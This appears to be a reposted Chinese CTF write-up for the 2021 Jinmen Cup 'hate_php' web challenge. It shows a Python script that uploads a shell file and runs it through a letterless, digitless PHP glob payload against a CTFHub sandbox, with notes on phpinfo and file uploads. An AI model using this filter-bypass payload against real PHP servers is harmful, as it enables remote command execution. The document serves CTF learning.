IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php -> 正文阅读

[PHP知识库]2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php

2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php

打开网址直接告诉你过滤的代码,把字母数字和$、_、@都过滤了,直接放弃
在这里插入图片描述
然后百度搜了这道题的答案,感觉发现了新大陆一样,下面是相关的几篇文章,强烈推荐阅读:
过滤了大写字母和数字的绕过方法:
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

过滤了大小写字母、数字、‘$’和‘_’
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html?page=2#reply-list

看完了这两篇文章这道题就基本解决了
先看本题的思路,同样是上传一个shell命令文件到网站的tmp目录下,用linux系统的特性构造payload执行这个文件
下面是简单的利用代码

import requests

headers = {
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0'
}
payload = '?code=?><?=`. /???/????????[?-[]`;?>'
url = 'http://challenge-25e97be714485b25.sandbox.ctfhub.com:10800/' + payload
files = {
    'file':open('./payload.txt','r')
}

proxy = {
    'http':'http://127.0.0.1:8888',
    'https':'http://127.0.0.1:8888'
}

response = requests.post(url=url, headers=headers, files=files, proxies=proxy, verify=False).text
print(response)

上传的payload文件的内容

#!/bin/sh
cat /flag

这里有个问题就是上传的文件在服务端会给一个随机的名称,所以可能不会一次就成功,需要多找几次,结果如下
在这里插入图片描述
这里是我做题的时侯的一个问题的记录

  1. 为什么php可以接受post请求上传的文件?
    查阅资料发现php的配置有一个选项
    在这里插入图片描述
    查看一下服务器的php配置文件的信息,查看phpinfo的信息
    通过修改payload里面的内容如下可以查看到phpinfo的信息(可以尝试其他方式)
    在这里插入图片描述
    从结果可以看到一些重要的信息
    在这里插入图片描述
    file_uploads = on 说明php文件可以接受post的文件上传请求
    在这里插入图片描述
  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-30 18:02:46  更:2022-03-30 18:03:17 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 7:07:46-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码